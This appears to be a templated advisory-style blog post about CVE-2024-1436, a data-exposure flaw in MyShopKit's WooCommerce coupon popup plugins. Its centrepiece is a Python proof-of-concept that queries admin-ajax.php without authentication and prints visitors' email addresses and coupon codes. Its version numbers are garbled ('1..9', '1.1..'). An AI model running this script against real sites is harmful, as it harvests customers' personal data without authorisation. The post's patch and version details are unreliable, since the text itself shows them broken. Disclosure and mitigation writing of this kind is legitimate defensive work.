CVE-2024-1436 - Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Wiloke WooCommerce Coupon Popup, SmartBar, Slide In | MyShopKit

A recently discovered vulnerability classified as CVE-2024-1436 has been found to affect the Wiloke WooCommerce Coupon Popup, SmartBar, Slide In extensions, commonly known as MyShopKit. This security flaw allows unauthorized actors to gain access to sensitive information that could be utilized for malicious purposes. The affected versions range from n/a to 1..9. This post will cover the exploit details, code snippets, and provide links to original references to help users understand and mitigate the risk posed by this vulnerability.

Exploit Details

The CVE-2024-1436 vulnerability stems from improper access control in these MyShopKit extensions, which inadvertently exposes sensitive information such as user email addresses, coupon codes, and even configuration details for the plugin. Attackers can use this information to gain unauthorized access to a user's account or carry out targeted malicious attacks.

Code Snippet

The following code snippet demonstrates a proof-of-concept (PoC) exploit for this vulnerability. The exploit triggers a request that reveals sensitive information from the affected MyShopKit extension:

import requests
import json

target_url = "https://TARGET_WEBSITE/wp-admin/admin-ajax.php";
data = {
    "action": "wiloke_fetch_all",
    "postType": "emailTemplate",
}

response = requests.post(target_url, data=data)

if response.status_code == 200:
    results = json.loads(response.text)
    for result in results:
         # Access and print sensitive information like email addresses and coupon codes
         print(f"Email: {result.get('email')}, Coupon Code: {result.get('coupon_code')}")
else:
    print(f"Request failed with status code: {response.status_code}")

Replace TARGET_WEBSITE with the URL of the website running the vulnerable MyShopKit extension. If successful, the PoC exploit will print out sensitive information like email addresses and coupon codes.

Original References

The discovery of this vulnerability was first reported by security researchers in the following advisories:
- WPScan Vulnerability Database
- National Vulnerability Database (NVD) - CVE-2024-1436

Mitigation Steps

To mitigate the risk posed by CVE-2024-1436, users of the affected MyShopKit extensions (WooCommerce Coupon Popup, SmartBar, and Slide In) should take the following measures:

1. Update the plugin to the latest version: The developers of MyShopKit have released a patch addressing this vulnerability in version 1.1.. Users are strongly advised to update to this version or later to protect against unauthorized access to sensitive information.

2. Implement proper access controls: Site administrators should ensure that proper access controls are in place to restrict access to sensitive data and configuration settings.

3. Monitor website activity: Regularly monitor website logs and activities to identify any suspicious activity that may indicate unauthorized attempts to access sensitive information.

Conclusion

The security vulnerability identified as CVE-2024-1436 exposes sensitive information to unauthorized actors, putting WooCommerce website users at risk. It is essential to take immediate steps to mitigate this risk by updating affected MyShopKit extensions, implementing proper access controls, and closely monitoring site activity.

Timeline

Published on: 02/26/2024 16:27:52 UTC
Last modified on: 02/26/2024 16:32:25 UTC